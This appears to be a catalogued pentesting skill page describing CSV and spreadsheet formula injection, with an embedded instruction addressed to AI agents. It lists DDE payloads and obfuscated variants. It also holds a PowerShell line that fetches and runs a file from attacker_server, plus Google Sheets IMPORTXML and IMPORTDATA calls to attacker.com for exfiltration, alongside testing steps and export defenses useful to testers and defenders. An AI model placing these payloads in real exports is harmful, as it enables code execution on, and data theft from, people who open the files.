Csv Formula Injection

作者 yaklang6fbf0bc8d5c7无许可证2.4K 个星标收录于 2026年10月8日更新于 2026年10月8日仓库3周前更新

CSV/spreadsheet formula injection (DDE, Excel/LibreOffice, Google Sheets IMPORT*). Use when exports, imports, or user fields feed spreadsheets or reporting tools.

仅含说明Security
AI 生成的概览

介绍 CSV 与电子表格公式注入,包括 DDE 载荷、混淆、Google Sheets 导入函数、测试与防御。

功能
该技能说明 CSV 与电子表格场景中的公式注入和 DDE 式注入,列出触发字符、示例载荷、混淆变体,以及可能发起外部请求的 Google Sheets 导入函数。它给出测试方法,用于追踪用户可控字段进入 CSV、XLSX 或制表符分隔导出文件并在 Excel、LibreOffice 或 Google Sheets 中打开的情况。它还列出导出层防御措施,例如加单引号或制表符前缀、去除开头的触发字符。
适用场景
当导出、导入或用户可控字段会进入电子表格或报表工具,需要评估公式注入风险时使用。它面向获得授权的测试,例如实验环境和有书面同意的项目,不适用于在项目规则未允许客户端执行测试时针对最终用户。
运行要求
不附带脚本,仅为说明文档。测试需要 Excel、LibreOffice Calc 或 Google Sheets 等电子表格软件,并需要目标环境的授权。

SKILL: CSV Formula Injection

AI LOAD INSTRUCTION: This skill covers formula/DDE-style injection in CSV and spreadsheet contexts, obfuscation, cloud-sheet primitives, and safe testing methodology. Use only where explicitly authorized; payloads that invoke local commands or remote fetches are impactful—prefer lab targets and document consent. Do not target end users without program rules allowing client-side execution tests.

0. QUICK START

Characters that may trigger formula evaluation when a cell is opened in Excel, LibreOffice Calc, or similar (often only if the cell is interpreted as a formula):

text
=+-@

Test cells may look like:

csv
name,valuetest,=1+1test,+1+1test,-1+1test,@SUM(1+1)

Routing note: when testing CSV exports, back-office reports, or user data opened in spreadsheets, prioritize these prefix characters.


1. DDE INJECTION (EXCEL / LIBREOFFICE)

Dynamic Data Exchange (DDE) and external call patterns historically abused in spreadsheets. Examples for controlled lab reproduction:

text
DDE("cmd";"/C calc";"!A0")A0
text
@SUM(1+1)*cmd|' /C calc'!A0
text
=2+5+cmd|' /C calc'!A0
text
=cmd|' /C calc'!'A1'

PowerShell-style chaining (lab only; replace host and payload with benign equivalents):

text
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0

2. OBFUSCATION

Defensive parsers may strip obvious patterns; testers may try noise and spacing (still only where allowed):

text
AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A

Extra whitespace after =:

text
=         cmd|'/c calc.exe'!A

Dispersed characters / unusual spacing (conceptual pattern—adjust per parser):

text
=    C    m D    |'/c calc.exe'!A

rundll32 style:

text
=rundll32|'URL.dll,OpenURL calc.exe'!A

3. GOOGLE SHEETS

If exported data is later opened in Google Sheets, or sheets pull from untrusted CSV, these functions can cause outbound requests or cross-document data pulls:

Data exfiltration / probe (replace URL with your authorized callback):

text
=IMPORTXML("http://attacker.com/", "//a/@href")

Other high-risk imports:

text
=IMPORTRANGE("spreadsheet_url", "range")=IMPORTHTML("http://attacker.com/table", "table", 1)=IMPORTFEED("http://attacker.com/feed.xml")=IMPORTDATA("http://attacker.com/data.csv")

Document which function executed and what network side effects occurred.


4. TESTING METHODOLOGY

  1. Map sinks — Any feature that emits CSV, XLSX, or tab-separated output: admin exports, audit logs, user rosters, billing reports, search results.
  2. Trace user-controlled fields — Profile fields, ticket titles, transaction memos, tags, filenames in ZIP exports—any column that echoes stored input.
  3. Inject formula prefixes — Start with benign arithmetic (=1+1, +1+1) to detect evaluation; escalate only per rules.
  4. Open in target software — Match victim workflow: Excel desktop, LibreOffice, Google Sheets import, locale-specific decimal separators.
  5. Evidence — Screenshot/capture whether the cell shows a calculated result, a security warning, or DDE prompt; note product version.

Note: focus on the user input -> export -> opened in spreadsheet software chain.


5. DEFENSE

Application and export-layer mitigations:

  • Prefix with single quote — In many spreadsheet apps, leading ' forces text interpretation: '=cmd|... displays literally.
  • Prefix with tab — Some pipelines treat tab-prefixed fields as non-formula text when ingested correctly.
  • Strip or neutralize leading triggers — Remove or escape leading =, +, -, @ (and Unicode lookalikes) at export time.
  • CSV encoding — Use consistent quoting; validate column types; avoid passing raw formula strings into financial/reporting templates without sanitization.
  • User education — Do not enable external data / DDE without policy.

Example safe export transformation (conceptual):

text
Input:  =1+1Output: '=1+1   OR   \t=1+1   OR   (empty prefix) with escaped quotes per RFC 4180

Note: when correlating business exports, reports, and API export parameters, combine with injection, business-logic, and API-security skills.

来源与署名

来源:yaklang/hack-skills位于skills/csv-formula-injection提交6fbf0bc

许可证: 无许可证

内容归原作者所有。SourceWeft 从公开仓库中收录这些内容。

举报或申请下架